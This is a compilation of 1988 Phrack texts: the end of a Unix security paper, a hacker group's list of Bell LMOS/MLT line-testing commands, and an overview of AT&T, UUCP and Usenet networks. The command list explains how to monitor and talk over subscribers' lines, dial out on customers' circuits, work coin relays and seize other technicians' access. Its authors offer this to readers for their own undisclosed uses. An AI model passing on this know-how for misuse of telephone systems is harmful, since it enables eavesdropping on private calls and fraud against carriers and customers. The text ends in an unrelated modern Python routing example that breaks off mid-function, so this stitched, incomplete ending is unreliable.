CONCLUSION 


Throughout this paper we have discussed conventional approaches to Unix system 
security by way of practical file management, password protection, and 
networking. While it can be argued that user education is paramount in 
maintaining Unix system security (11), factors in human error will promote some
degree of system insecurity. Advances in protection mechanisms through 
better-written software (12), centralized password control (13) and 
identification devices may result in enhanced Unix system security. 

The question now asked applies to the future of Unix system operating. Can 
existing Unix systems accommodate the security requirements of government and 
industry? It appears not, at least for governmental security projects. By 
following the Orange Book (14), a government graded classification of secure 
computer systems, the Unix system is only as secure as the C1 criterion. A C1
system, which has a low security rating (D being the lowest) provides only 
discretionary security protection (DSP) against browsers or non-programmer 
users. Clearly this is insufficient as far as defense or proprietary security 
is concerned. What is needed are fundamental changes to the Unix security 
system. This has been recognized by at least three companies, AT&T, Gould and 
Honeywell (15, 16, 17). Gould, in particular, has made vital changes to the 
kernel and file system in order to produce a C2 rated Unix operating system. 
To achieve this, however, they have had to sacrifice some of the portability 
of the Unix system. It is hoped that in the near future a Unix system with an 
A1 classification will be realized, though not at the expense of losing its
valued portability. 


==Phrack Inc.==
Volume Two, Issue 18, Phile #8 of 11 
Control C 
and 
The Tribunal of Knowledge presents... 
LMOS (Loop Maintenance Operation System) 


-A List of Commands-


This file contains what to our knowledge are the best things to do on 
LMOS. We were really vague due to the great power of the information provided 
in this file. You now know the commands so we will not go into (either in 
this file or when talking to us) how to use this information, it is up to you 
to figure out how to use it. 


+: Increase the voice volume on a line


+ lets you increase the volume when you are talking on or monitoring a
subscriber’s line over a callback path. The volume is increased because MLT
adds amplifier to the line. + may be used after a mon, talk, rev, talkin or
call request. Sometimes MLT adds an amplifier automatically to a long line.
You will not know it is there so if you try to add amplification, a + will
appear in the status sections but the voices will not get any louder because
they are already as loud as possible.


-: Decrease the voice volume on a line


- lets you decrease the volume when you are talking on or monitoring a
subscriber’s line over a callback path. The volume is decreased because MLT
removes amplifier from the line. - may be used to remove amplifier that you
have placed on the line with the + request, or amplifier that MLT has
automatically placed on a long line. The main reason to remove the amplifier
is because it can sometimes cause a shrill or howl.


Call: Make a call on a subscriber’s line


Call lets you use your touch-tone pad to dial any number you want using the
customer’s line circuit. It does this by simulating an off-hook condition in
order to draw dial tone. A callback number is a required entry on the tv mask
and an mdf access is required for calling out (except in SXS and panel
offices). You can use a call when: 1) You want to know the TN for a known CA
& PR - you would call TSPS or ANI. 2) Calls cannot be completed to a TN - you
would call that TN. 3) To monitor dial tone on a customer’s line.


Callrd: Make a call on a dial pulse line circuit 


Callrd lets you use your touch-tone pad to dial using the customer’s rotary 
dial line circuit. MLT does this by translating tones on a customer’s line. 
mdf access is required for calling out (except in SXS, DMS10, DMS100, and 
DMS100AC offices). Use a callrd if you want to know the TN for a known CA &
PR - you would call TSPS or ANI.


Ccol: Collect coins using coin relay 


Ccol attempts to collect any coins that are in the hopper of a coin telephone
set by operating the coin relay. Ccol does not check the totalizer or check
the rest of the line. The results tell you only about relay operation, speed,
and the current that is necessary to operate it. A ver code is not returned
by ccol. You must have access to the line before you request ccol. You will
use ccol most often when you are talking to a repair person who is trying to
fix a coin phone.


Channel: Run enhanced channel tests on DLC lines 


Chan or channel runs channel isolation tests and tells you if you have a bad
COT or RT channel unit. Use this request to run enhanced channel tests on 
lines served by digital loop carriers such as SLC Series 5. Chan can only be 
run if there is special equipment in the co you’re testing in. If you are 
testing a non-locally switched line with the SSA request, channel tests must 
be run separately with this request. Chan may also be used to run channel 
isolation tests on switched lines from the tv or stv mask, but these tests are 
included when you do a full or loop on a switched line. 


Change: Change status information 


Change allows you to change cable, pair or comment information that is 
displayed without having to request a test or any other type of information. 
The permanent line record information is not changed. To request a change,
enter "change" in the req field of the tv and enter the change of information. 


Chome: Home totalizer on a coin telephone 


Chome attempts to return a totalizer to the starting position (home) for 
counting coins. The totalizer counts the coins and sends a tone back to the 
co for every 5 cents deposited. If it is not homed, coins can’t be deposited. 
A chome request tells you whether the totalizer was homed, how many tones were 
sent to the co, and the current that was used to home the totalizer. A line 
must already be accessed to request a chome. Chome is often used when a 
repair person is trying to fix a coin telephone. 


Co: Test the central office equipment 


Co initiates a series of tests on the subscriber’s line circuit. Co can be 
requested using either a no-test or an MDF trunk. A no-test access connects 
you to the entire loop but a co request tests only the inside portion. An MDF 
access is only connected to the inside portion of the loop. The outside 
portion is physically disconnected. Use a no-test access when you are fairly 
sure the trouble is inside the central office. Use a co on an MDF access when 
you are not sure where the trouble is. 


Coin: Test a coin telephone set 


Coin initiates a full series of tests on a telephone line. The station set, 
the totalizer, the coin relay, the loop and the co equipment are checked. If 
the coin request finds something wrong with either the totalizer or the relay, 
it stops testing and tells you the trouble is in the set. If it finds nothing 
wrong, it runs the full series of tests. Coin may be used when a repair
person is trying to fix a coin telephone. If a coin phone is newly installed, 
coin will check the set even though there is no line record. 


Cret: Operate coin relay to return coins 


Cret attempts to return any coins that may be lodged in the hopper of a coin 
telephone set. It operates the coin relay so that it will return the coins. 
It tries to return them 3 times before giving up. If it is successful, it 
also checks the speed of the relay. It does not check the totalizer or the 
rest of the line. You should have access to the line before you request a 
cret. You will use cret primarily when you are talking to a repair person who 
is trying to repair a coin telephone.


Cset: Check totalizer and relay in coinset 


Cset checks the totalizer and the coin relay in a coin telephone set. The 
totalizer is the mechanism in the phone that counts deposited coins and sends 
a tone back to the co for every 5 cents that is deposited. The relay is the 
mechanism that either returns or collects the coins that are deposited. Cset 
does not check the co or loop parts of the line. Cset can be used when you 
are talking to a repair person who is fixing a coin telephone. 


Dial: Test a subscriber’s rotary dial 


Dial checks the subscriber’s rotary dial. You must be in contact with the
subscriber, either over a callback path or over a ddd line. For the dial
request to work correctly, tell the subscriber to dial a "0" after hearing
brief dial tone. The results of a dial request tell you whether the dial is
okay or not, whether the dial speed is okay and what the speed is, and whether
the break is okay and what the break is. Use the dial request when you
suspect a problem with the telephone set. The trouble report could be "Can’t
call out" or "Gets wrong numbers", for example.


Dtout: Test a pbx line circuit 


Dtout initiates a series of tests on a pbx line circuit. Dtout must be 
requested using an MDF trunk. It is used to draw dial tone and check the 
arrangement of the pbx line circuit. Use dtout when you need to check the 
condition of special service circuits that do not use central office switches. 


Full: Test the entire telephone line


Full starts a series of tests that do an extensive analysis of the entire 
line. This includes both the inside and outside portions. Many individual 
tests are run and the most important results are displayed in the summary 
message. Outside, MLT checks for AC and DC faults. Inside, it checks the line 
circuit and dial tone. The results may also include many other types of 
information about the line. You might request a full line test when you first
access a line or when you need to know a lot about a line. 


Grm: Get fast ground resistance measurement 


Grm gives you a quick measurement of the DC resistance of the ground path from
the strap to the test hardware. Before you do a grm, have the repair person
strap the tip and ring wires to ground. If this isn’t done, grm will give you
incorrect values. The line must be accessed before you do a grm request. You
can use grm when you are talking to a repair person who is fixing a coinset.
The resistance values obtained from a grm can be compared to old resistance
values that are stored inside each coinset.


Help: List the valid tv requests 


Help returns a list of all of the valid requests used in MLT-2. Help can be 
used when you are not sure which request to use in a particular situation, or 
when you can’t remember an exact request name. For example, the correct entry 
to reverse polarity on a touch-tone line is "Rev.", help will tell you this. 
For a description of any specific request, enter the name of the request 
followed by a question mark. 


Info: Get general information about a line 


Info gives you the wire center name and the location of the frame; the 
exchange key, MDF group and MDF trunk numbers associated with the subscriber’s 
line; the telephone number at the appropriate frame; and the assignment 
telephone number. You can get information about a whole telephone number, an 
NPA-NXX-, or an exchange key. MLT does not access the line when you request 
info, but it keeps access if you already have it. If there are multiple 
frames in an office, MLT gives you information about all of them.


Keep: Keep an access that you already have 


Keep lets you hold access to a no-test or MDF trunk that is about to 
"timeout." MLT keeps track of which trunks you have accessed but have not 
used for a while. MLT will automatically drop the access for you after a 
certain period of time. About 2 minutes before dropping the access, MLT gives 
you a warning message and also highlights the status line that will be 
dropped. If you want to keep the access, you should enter "keep" in the req 
field and the tn or line number of the access to be held. To drop an access 
when you are finished with it, enter an x in the req field.


Lin: Test the inside part of the loop 


Lin starts a series of tests on the inside portion of a line. Lin includes
the same tests as the loop test and can identify a co line circuit if one is
present. Lin does not do the regular line circuit and draw and break dial
tone tests. An MDF access is required for a lin request. You can use lin to
test special circuits that do not use a co switching machine. For example, if
the circuit has 2 loops connected at the frame, lin lets you look at the
second loop (both full and loop only test toward one loop).


Lloop: Run the long loop analysis on the outside or loop part of a line 


The ll request starts a series of tests which do extensive analysis of the 
outside portion of the subscriber’s line. It is specifically designed to 
handle cases that the regular loop request was not designed to handle. These 
cases include very long loops (over 100,000 feet) and multiparty lines on 
moderate-to-very-long loops. It does similar measurements to those that loop 
does, but analyzes the results differently. It expects to see a loop that has 
no dc faults or only very light dc faults. If you use a loop or lloop on a
loop that has serious dc faults it will not do the long loop analysis.


Loc1: Measure distance to 1-sided resistive fault


Loc1 gets MLT to measure how far a one-sided fault is from the repair person.
Because telephone lines can be very long, it can be difficult for a repair
person to find the location of a resistive fault. You can use loc1 to help
the repair person locate a 1-sided fault. You should be in contact with the
repair person on a line other than the one being measured. Have the repair
person open the pr at a ready-access point beyond the fault if possible. Ask
him/her to strap the pr tip to ring. Remember to enter a temperature on the
tv mask before you transmit the loc1 request.


Loc2: Measure distance to 2-sided resistive fault 


Loc2 gets MLT to measure how far a two-sided fault is from the repair person. 
Remember that you must run a locgp before you run a loc2 and that you must be 
in contact with the repair-person on a line other than the one you will be 
measuring. The repair-person must connect the bad pair to the good pair in a
specific way; the exact method to use is explained in the results of the locgp
request. Locgp and loc2 can also be used to sectionalize a one-sided
resistive fault. Remember to enter a temperature on the tv mask before you 
transmit the loc2 request. 


Look: Look for an intentional fault 


Look is used to identify a fault, usually a short or ground, that has been 
placed on the line by the repair person. Look can be used when a repair 
person is having trouble locating a particular line. Look gets MLT to monitor 
the line that the repair person is looking for. When the repair person shorts 
or grounds the line, mlt sends a tone to you over your headset. You can tell 
the repair person that you "see the short". A callback path is required for a 
look request. You should talk to the repair person on a line other than the 
one you are working on. 


Lookin: Look for an intentional fault on a special services line 


Lookin is used to identify a fault, usually a short or ground, that has been
placed on the special services line by the technician. Lookin is used to
locate a particular line by having MLT monitor the line that the repair person
is looking for. When the repair person shorts or grounds the line, MLT sends
a tone to you over your headset. You can tell the repair person that you "See
the short." A callback path is required for a lookin request. You should talk
to the repair person on a line other than the one you are working on. MDF
access is required.


Loop: Test the outside part of the loop 


Loop starts a series of tests that do an extensive analysis of the outside 
portion of the line. Loop does every test that full does except the line
circuit and draw and break dial tone tests. Loop can be requested using
either a no-test or an MDF trunk. A no-test access connects you to the entire
line but a loop request tests only the outside portion. An MDF access is only
connected to the outside portion. Use a no-test trunk when you are fairly sure
the trouble is out of the co and an MDF when you are not sure.


Lrm: Get fast loop resistance measurement 


Lrm gives you a quick measurement of the DC resistance on a line. Lrm can’t
be run unless either the receiver is off-hook or the line is strapped tip to
ring (an intentional short is placed on the line by the repair person). Also,
MLT will not accept an lrm request if there is a hard ground on the line. Lrm
does not access the line so you must already have access to do an lrm. You
can use lrm when you are talking to a repair person who is fixing a coinset.
The resistance values obtained from the lrm can be compared to the old
resistance values that are stored inside each coinset.


MDF (#): Access a specific MDF trunk 


MDF (#) lets you choose the MDF trunk that you want MLT to access. Use this 
request when an MDF trunk is connected to a telephone line at the MDF but is 
not connected to the loop testing system. This may occur in small offices 
where the frame attendant doesn’t work for the entire day. You can also use 
this request when an MDF trunk has to be tested and repaired. The MDF entry 
must be a five character entry consisting of the wire center identifier and 
the trunk number. 


Mdf: Access a main distributing frame (MDF) 


MDF connects the mlt testing equipment to an MDF trunk. Before you can enter 
any requests, you must have the frame attendant connect the MDF trunk to the 
subscriber’s line. Remember that MLT automatically accesses a no-test trunk 
unless you specifically request an MDF trunk. An MDF trunk goes directly from
the loop testing system to the main distributing frame, bypassing the central
office switch. Using an MDF trunk allows you to test loops that are connected
to co equipment that is not MLT-testable. Also, you can sectionalize a fault
in or out of the co by testing "in" or "out" using MDF.


MDF (gr): Access a trunk from a certain mdf trunk group 

MDF (gr) lets you choose the MDF trunk group from which MLT will choose an MDF 
trunk. Use the MDF(gr) request when the NPA-NXX that you are using has more 
than one frame associated with it and you can’t enter cable and pair numbers. 
For example, to request MDF trunk group a, you should enter MDFA in the req 
field. To find out which trunk groups are available for your NPA-NXX you can 
either enter an mdf or an info request. Remember that you still have to call 
the frame attendant to have the trunk and line connected and also disconnect 
when you are finished. 


Mdfin: Test the inside part of a line 


Mdfin starts a series of tests that do an extensive analysis of the inside 
line. This includes line circuit and dial tone tests. The mdfin request uses 
a special line that runs from the MLT testing equipment to the MDF. You must 
ask the frame attendant to connect this line to the subscriber’s line. Then 
you must enter the telephone number of this special line on the test mask 
along with mdfin and the subscriber’s number. For more information see the 
mdfio module in the MLT-2 user guide. 


Mdfout: Test the outside part of a line 


Mdfout starts a series of tests that do an extensive analysis of the outside 
line. This includes the DC and AC tests. The mdfout request uses a special 
line that runs from the mlt testing equipment to the MDF. You must ask the 
frame attendant to connect this line to the subscriber’s line. Then you must 
enter the telephone number of this special line on the test mask along with
mdfin and the subscriber’s number. 


Mon: Monitor a subscriber’s line 


Mon lets you monitor a subscriber’s line. Sometimes you are a better judge of
whether there is noise, speech, or a recording on a line than MLT is. If you 
want to listen to a line to determine if one of these conditions does exist, 
use the mon request. You can also be automatically placed in the monitor mode 
by MLT in some cases. You will be put in monitor mode if you request ring, 
talk or psr but MLT thinks the line is busy, or if you must talk to the 
subscriber to run a rev, dial, or tt. A callback number is required. You can 
request quick, look, or full while in monitor mode. 


Psr: Release a permanent signal 


Psr attempts to release a permanent signal in a step-by-step central office. 
A permanent signal is a steady dial tone on a line. A frequent cause is a 
receiver that is off-hook. Psr lets you remove the permanent signal so that 
you can monitor for room noise. If when you monitor the line you still hear 
steady dial tone, you should suspect permanent signal on the line. Psr 
requires a callback path between your callback line and the subscriber’s line. 
You should already have the callback path established before you enter a psr 
request. 


Qin: Run a quick series in toward the co 


Qin starts a series of tests that make a "quick" check of the loop toward the 
central office. It includes the same tests as quick. It can also identify a 
co line circuit if one is present and will report a line circuit if the DC 
resistances look like one is present. An MDF access is required for a qin 
request. You can use qin to test special switching machines. For example, if
the circuit has 2 loops connected at the frame, qin lets you look at the 2nd
loop (both full & loop only test toward one loop). 


Rev: Identify touch-tone polarity reversals 


Rev helps you identify a touch-tone polarity reversal. On a good line, the
battery is connected to the ring wire and the ground is on the tip wire.
These wires must be connected to specific terminals on the telephone. If they
are reversed, the subscriber will be able to receive calls but will not be
able to dial out. If the line is reversed, you won’t be able to hear the
tones before you enter a rev request. Rev only reverses the line temporarily.
A callback path should be established before you make a rev request.


Rin: Ring a subscriber’s special services line 


Rin lets you ring a telephone on a special services line. A callback is 
required. If one doesn’t exist, ring in sets one up for you. To answer the 
callback, answer its ring and press "0" on the touch-tone pad, and listen for 
ringing. When the subscriber answers, you will be placed in talk mode. If 
the line is busy, the call in progress will be interrupted. Use rin to 
contact the subscriber or a technician at the subscriber’s home. MDF access 
is required to request rin. 


Ring(#): Ring a specific party on a multi-party line 


Ring(#) lets you choose the telephone that you want to ring on a multiparty 
line. A multiparty line is one on which more than one subscriber is connected 
to the same pair of wires. Normally MLT checks the line records of the 
telephone number you enter using the ring request, and automatically rings the 
correct party. When the line records indicate 2, 4, or 8 party, use the 
ring(#) request and specify the party number in place of the "#." If you 
request ring1, MLT rings the party connected to the ring side. If you request
ring2, MLT rings the party connected on the tip side. 


Ring: Ring a subscriber’s line 


Ring lets you ring a telephone on a single party line. A callback path is 
required but if one doesn’t exist, ring sets one up for you. To answer your 
callback, answer its ring and press "0" on the touch-tone pad, and listen for 
ringing. When the subscriber answers, you will be placed in talk mode. If 
the line is busy or cannot be rung, you will be placed in monitor mode to
listen for noise or speech. Use ring to contact the subscriber or a repair 
person at the subscriber’s home. 


Ringer: Check ringer configuration on a line 


Ringer counts the number of ringers on each part of the loop (tip-ring, 
tip-ground, and ring-ground). The results tell you the number of telephones 
found by MLT. If there is a problem, the summary explains the problem. If 
you are testing a party line, some of the ringers found may belong to the 
other party. 


Rin: Ring a subscriber’s special services line 


Rin lets you ring a telephone on a special services line. A callback is 
required. If one doesn’t exist, ring-in sets one up for you. To answer the 
callback, answer its ring and press "0" on the touch-tone pad, and listen for 
ringing. When the subscriber answers, you will be placed in talk mode. If 
the line is busy the call in progress will be interrupted. Listen for noise
or speech. Use rin to contact the subscriber or a technician at the
subscriber’s home. MDS is required to request rin. 


Soak: Identify swinging resistance condition 


Soak identifies unstable ground faults (swinging resistance) on a line. 
Voltage is applied to the line and a series of DC resistance measurements are 
made to see the effect of that voltage. If the resistance values are all low,
the fault is probably stable. If even one value is 20% larger than the 
original measurement, the fault may be unstable (swinging). A repair person 
who is dispatched may have trouble locating a swinging fault. Use soak when 
you find a 10-1000 kohm ground on a q test (full & loop include the soak 
test), or just prior to dispatch to double-check a line’s condition. 


Ssa: Special services access 
The ssa request is used to access non-locally switched customer telephone 
lines. Accessing these lines is a special case of a no-test trunk access. 
However, if they go through a digital loop carrier such as SLC Series 5, and 
there is special equipment available in the co, then you can test them with a 
no-test trunk special services access. This means you don’t have to call the
trunk. The request can only be run from the stv mask. 


Stv: Special services trouble verification request 


The stv request changes you from a tv mask to an stv mask. Stv is used when 
you need to test special services circuits (non-locally switched lines) served 
by digital loop carrier systems such as SLC Series 5. Switching to the stv 
mask will not affect any information you left in the tv mask -- your status 
lines will remain the same; however, the middle section of the mask will be 
changed. Any request done from a tv mask can also be done from an stv mask, 
but not vice versa. The stv request can only be run from a tv mask. 


Take: Take control of a long-term access


Take is used when you want to transfer a long-term access from someone else’s
terminal to your terminal. To take control of a no-test access, enter the
telephone number that you want to transfer in the tn field. To transfer an
MDF access to your terminal, enter the NPA-NXX in the tn field and the MDF
number in the space to the right of the regular tn field of the tv mask.
Finally, enter take in the req field. If the previous holder had a callback
established, it would not be removed. If necessary, you must remove the
callback using xcb and request a new callback to your telephone.


Talk: Talk over the subscriber’s line 


Talk lets you talk to either a subscriber or a repair person on a subscriber’s
line. Talk does not ring the line so there must be someone waiting to talk to
you on the other end of the line. A callback path is required for the talk
request but if one does not already exist, talk will set one up for you if you
have a callback number entered. If the line is already accessed before the
talk request, MLT enters a "t" and the last 2 digits of the callback number
under the callback heading and updates the time since access. You can request
quick, loop, or full while in talk mode.


Talkin: Talk over the subscriber’s special services line


Talkin lets you talk to a subscriber or a repair person on a special services 
line. Talkin does not ring the line so there must be someone waiting to talk 
to you on the other end of the line. A callback path is required for the 
talkin request but if one does not already exist, talkin sets one up for you 
if you have a callback number entered. If the line is already accessed before 
the talkin request, MLT enters a "t" and the last 2 digits of the callback 
number under the callback heading and updates the time since access. You must
have an MDF access to request talkin.


Tone+: Use loud tone to help identify a pair

Tone+ puts a high amplitude tone on a line. It is used on pairs that are very 
long. The extra amplitude helps the repair-person hear the tone over long 
distances. Tone is used to help a repair person to locate the correct pair in 
a cable with many pairs of wires in it. Use tone+ when a repair person
requests a tone on a very long pair. If you have a callback on the line, it
will be placed in monitor mode. If the status line gets brighter & you get a
changed state message, it means 1) The repair person found the pr & wants to
talk to you or 2) The subscriber has gone off-hook.


Tone: Use tone to help craft identify a pair 


Tone puts a metallic tone on a line. There may be many pairs in a single 
cable, making it difficult for a repair person to locate a specific line. The 
tone makes this job easier. Before MLT places a tone on a line it does a 
test. The results tell you if there is a fault on the line. If there is a 
callback on the line when you request a tone, it will be placed in monitor 
mode. If the status line gets brighter and you get a changed state message, 
it means either 1) The repair person found the pr & wants to talk to you or 2)
The subscriber has gone off-hook.


Toneca: Use tone to help identify a cable 


Toneca puts a longitudinal tone on a line. This tone helps the repair person 
find the cable binder group that the pair is in. The repair person finds the 
correct cable by listening for the tone. Because the tone can be heard on
pairs other than the one you put it on, when tone or tone+ are inappropriate.
If the repair person does not have time to find the cable on the first try, 
you can repeat the request. Before placing the tone on the line, MLT does a 
pretest and tells you if there is a fault on the line. 


Tonein: Use tone to help a technician identify a special services pair 


Tonein puts a metallic tone on a special services line. It may be difficult 
for a technician to locate a specific line. The tone makes this job easier. 
Before MLT places a tone on a line it does a pretest. An MDF access is 
required in order to request a tonein. If a callback is on the line when you 
request tonein, it is placed in monitor mode. If the status line gets 
brighter and you get a changed state message, it means either 1) The repair 
person found the pr & wants to talk to you or, 2) The subscriber has gone 
off-hook.


Tt: Test the subscriber’s touch-tone pad 


Tt checks a subscriber’s touch-tone pad. It analyzes the tones produced when
the subscriber presses the buttons in the sequence 1 through 0. You must
instruct the subscriber to press the buttons after hearing dial tone. MLT will
signal you over your headset with two beeps if the pad is good or one or no
beeps if it is bad. A callback path should be established before you make a tt
request. You must use a no-test trunk access to request it. You can use the
ring request to contact the subscriber and set up a callback.


Tv: Trouble verification request 

The tv request changes you from an stv mask to a tv mask. Tv is used when you 
need to do interactive testing of locally switched telephone lines, or tests 
using an MDF trunk. Switching to the tv mask will not affect any information 
you left in the stv mask -- your status lines will remain the same; however, 
the middle section of the mask will be changed. Any request done from a tv 
mask can also be done from an stv mask, but not vice versa. The tv request can
only be run from an stv mask.


Ver##: Get definition and example of a ver code 


Ver gives you a description of the ver code that you type in place of the 
##. For example, a ver22 request will give you a definition of verification 
code number 22 and an example of a typical set of test results that might 
accompany a ver code of 22. Use this request whenever you can’t remember what 
a certain ver code means. MLT stores your tv mask when you request ver code
information.


Ver: Test the entire telephone line


Ver starts a series of tests that do an extensive analysis of the entire line.
This includes both the inside and outside portions. Many individual tests are 
run but only the ver code and summary messages are displayed. Outside, MLT 
checks for AC and DC faults. Inside, it checks the line circuit and dial 
tone. 


Thanks to AT&T and the Bell Operating Companies. 
Control C and The Tribunal of Knowledge 
If you have any questions or comments contact: 
Control C 
Jack Death 
Prime Suspect 
The Prophet 
The Urvile 


Or any other member of the TOK. 




==Phrack Inc.== 
Volume Two, Issue 18, Phile #9 of 11 


The Tribunal of Knowledge presents... 


A Few Things About Networks 


Brought to you by Prime Suspect (TOK) 


June 1, 1988 


Seems like if you’re into hacking you sometime or another run into using 
networks, whether it be Telenet, Tymnet, or one of the Wide Area Networks.
One popular Network that hackers have used for some time is Arpanet. Arpanet 
has been around for quite a long time. There are changes made to it almost 
daily and the uses of it are much more than just logging into other systems. 
Many college students find themselves getting acquainted with Bitnet these 
days. Bitnet is SO new compared to other networks that it’s got a lot of 
potential left. There is much more to it than just mail and file transfers.
There are interactive uses such as the RELAY for real-time discussion with
others (equivalent to a CB mode) and another popular use is the network 
information center to receive technical files about networking. There are 
many many mail addresses that are used for database searching, and subscribing 
to electronic magazines. You will find these same uses on other Wide Area
Networks also. I will give you 3 related network areas. These three areas
include: The AT&T company networks, UUCP, and Usenet cooperative networks. 
Please note that some of the information I gathered for this file dated back 
to 1986. But I tried to keep it as current as possible. 


AT&T (Company Network) 


AT&T has some internal networks, most of which use internally developed 
transport mechanisms. Their most widely used networks are UUCP and USENET, 
which are not limited to that corporation and which are discussed later. All 
internal AT&T networks support UUCP-style h1!h2!h!u source routing syntax and
thus appear to the user to be UUCP. Within AT&T, UUCP links are typically 
over 1,200-bps dial-up telephone lines or Datakit (see below). 

Among AT&T’s other networks, CORNET is an internal analog phone network 
used by UUCP and modems as an alternative to Direct Distance Dialing (DDD). 
Datakit is a circuit-switched digital net and is similar to X.25 in some 
ways. Most of Bell Laboratories is trunked together on Datakit. On top of DK 
transport service, people run UUCP for mail and dkcu for remote login. In 
addition to host-to-host connections, Datakit supports RS232 connections for
terminals, printers, and hosts. ISN is the version of Datakit supported by 
AT&T Information Systems. Bell Laboratories in Holmdel, New Jersey, uses ISN 
for internal data communication. BLICN (Bell Labs’ Interlocation Computing 
Network) is an IBM mainframe RJE network dating from the early 1970s when 
Programmer’s Workbench (PWB) was a common version of the UNIX operating 
system. Many UNIX machines with PWB-style RJE links use BLICN to queue mail 
and netnews for other UNIX machines. A major USENET host uses this mechanism 
to feed news to about 80 neighbor hosts. BLICN covers Bell Laboratories 
installations in New Jersey, Columbus, Ohio, and Chicago, and links most 
computer center machines. BLN (Bell Labs Network) is an NSC Hyperchannel at 
Indian Hill, Chicago. 
AT&T Internet is a TCP/IP internet. It is not a major AT&T network, though 
some of the best-known machines are on it. There are many ethernets connected 
by TCP/IP over Datakit. This internet may soon be connected to the ARPA 
Internet. 

ACCUNET is AT&T’s commercial X.25 network. AT&T MAIL is a commercial 
service that is heavily used within AT&T Information Systems for corporate 
internal mail. 


UUCP (Cooperative Network)


The name "UUCP," for Unix to Unix CoPy, originally applied to a transport 
service used over dial-ups between adjacent systems. File transfer and remote 
command execution were the original intent and main use of UUCP. There was an 
assumption that any pair of communicating machines had direct dial-up links, 
that is, that no relaying was done through intermediate machines. By the end 
of 1978, there were 82 hosts within Bell Laboratories connected by UUCP. 
Though remote command execution and file transfer were heavily used, there is 
no mention of mail in the standard reference. There was another similar 
network of "operational" hosts with UUCP links that were apparently outside 
Bell Laboratories, but still within the Bell System. The two networks 
intersected at one Bell Laboratory machine. 

Both of these early networks differed from the current UUCP network in 
assuming direct connections between communicating hosts and in not having 
mail service. The UUCP mail network proper developed from the early networks 
and spread as the UUCP programs were distributed as part of the Unix system. 

Remote command execution can be made to work over successive links by 
arranging for each job in the chain to submit the next one. There are several 
programs that do this: Unfortunately, they are all incompatible. There is no 
facility at the transport level for routing beyond adjacent systems or for 
error acknowledgement. All routing and end-to-end reliability support is done 
explicitly by application protocols implemented using the remote command 
execution facility. There has never been any remote login facility associated 
with UUCP, though the cu and tip programs are sometimes used over the same
telephone links. 

The UUCP mail network connects a very diverse set of machines and users.
Most of the host machines run the UNIX operating system. Mail is the only
service provided throughout the network. In addition to the usual uses of
mail, much traffic is generated as responses to USENET news. The same
underlying UUCP transport mechanisms are also used to support much
of USENET.

The UUCP mail network has many problems with routing (it is one of the few
major networks that uses source routing) and with its scale. Nonetheless, it
is extremely popular and still growing rapidly. This is attributable to three
circumstances: ease of connection, low cost, and its close relationship with
the USENET news network.

Mailing lists similar to those long current on the ARPANET have recently
increased in popularity on the UUCP mail network. These permit a feature that
USENET newsgroups cannot readily supply: a limitation on access on a
per-person basis. Also, for low-traffic discussions mailing lists are more
economical, since traffic can be directed to individuals according to their
specific interests.

There is no central administration. To connect to the network, one need
only find one machine that will agree to be a neighbor. For people at other
hosts to be able to find your host, however, it is good to be registered in
the UUCP map, which is kept by the group of volunteers known as the UUCP
Project. The map is posted monthly in the USENET newsgroup "comp.mail.maps".
There is a directory of personal addresses on the UUCP network, although this
is a commercial venture unrelated to the UUCP Project.

Each host pays for its own links; some hosts encourage others to connect
to them in order to shorten mail delivery paths.

There is no clear distinction between transport and network layers in UUCP,
and there is nothing resembling an Internet Protocol. The details of the
transport protocol are undocumented (apparently not actually proprietary to
AT&T, contrary to rumor, though the source code that implements the protocol
and is distributed with UNIX is AT&T’s trade secret).

Mail is transferred by submitting a mail command over a direct connection
by the UUCP remote command execution mechanism. The arguments of the mail
command indicate whether the mail is to be delivered locally on that system
or resubmitted to another system. In the early days, it was necessary to
guess the route to a given host and hope. The only method of acknowledgment
was to ask the addressee to reply. Now there is a program (pathalias) that
can compute reasonable routes from the UUCP map, and there is software that
can automatically look up those routes for users.

The UUCP mail network is currently supported in North America mostly by
dial-up telephone links. In Europe there is a closely associated network
called EUnet, and in Japan there is JUNET.

The most common dial-up link speed on the UUCP mail network is 1,200 bps 
though there are still a few 300-bps links, and 2,400 bps is becoming 
more popular. Actually, now I believe that 1200-bps is still very common, 
but 2400 may be just as common, and 9600-bps is much more common than ever 
thought it would be in 1986. There are also many sites that use 19,200-bps 
for using UUCP. When systems are very close, they are sometimes linked by 
dedicated lines, often running at 9,600 bps. Some UUCP links are run over 
local-area networks such as ethernets, sometimes on top of TCP/IP (though more 
appropriate protocols than UUCP are usually used over such transport media, 
when UUCP is used its usual point-to-point error correction code is bypassed
to take advantage of the reliability of the underlying network and to improve 
bandwidth). Some such links even exist on long-haul packet networks. 

The widespread use of more sophisticated mail relay programs (such as 
sendmail and MMDF) has increased reliability. Still, there are many hosts 
with none of these new facilities, and the sheer size of the network makes
it unwieldy.

The UUCP mail network has traditionally used source routing with a
syntax like hosta!hostb!hostc!host!user. The UUCP map and pathalias have made 
this bearable, but it is still a nuisance. An effort is underway to alleviate 
the routing problems by implementing naming in the style of ARPA Internet 
domains. This might also allow integration of the UUCP name space into 
the ARPA Internet domain name space. In fact there is now an ATT.COM domain 
in which most hosts are only on UUCP or CSNET. Most UUCP hosts are not yet in 
any Internet domain, however. This domain effort is also handled by the UUCP 
Project and appears to be proceeding at a methodical but persistent pace. 
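
The route lookup and hop-by-hop relaying described above, as an added example (not part of the original file and not pathalias's own code). A plain shortest-path search (Dijkstra's algorithm) stands in for the route computation; the host names, link costs and function names are assumptions made for the illustration.

```python
import heapq

# Constructed sample map: host -> {neighbor: link cost}. Names and costs are
# invented for this example; the real UUCP map has its own file format.
SAMPLE_MAP = {
    "hosta": {"hostb": 300, "hostc": 2000},
    "hostb": {"hosta": 300, "hostc": 500, "hostd": 4000},
    "hostc": {"hostb": 500, "hostd": 500},
    "hostd": {"hostc": 500},
}


def compute_routes(links, origin):
    """Return {host: [hop, hop, ...]} with the cheapest hop list from origin."""
    best = {origin: (0, [])}
    queue = [(0, origin, [])]
    while queue:
        cost, host, hops = heapq.heappop(queue)
        if cost > best[host][0]:
            continue  # stale queue entry, a cheaper route was already found
        for neighbor, link_cost in links.get(host, {}).items():
            new_cost = cost + link_cost
            if neighbor not in best or new_cost < best[neighbor][0]:
                best[neighbor] = (new_cost, hops + [neighbor])
                heapq.heappush(queue, (new_cost, neighbor, hops + [neighbor]))
    return {h: hops for h, (_, hops) in best.items() if h != origin}


def bang_address(routes, dest_host, user):
    """Build the source-routed address the sender types: hop!hop!host!user."""
    return "!".join(routes[dest_host] + [user])


def relay(links, local_host, address):
    """What one host does with the address argument of the mail command.

    Returns ("deliver", user) when no hop is left, otherwise
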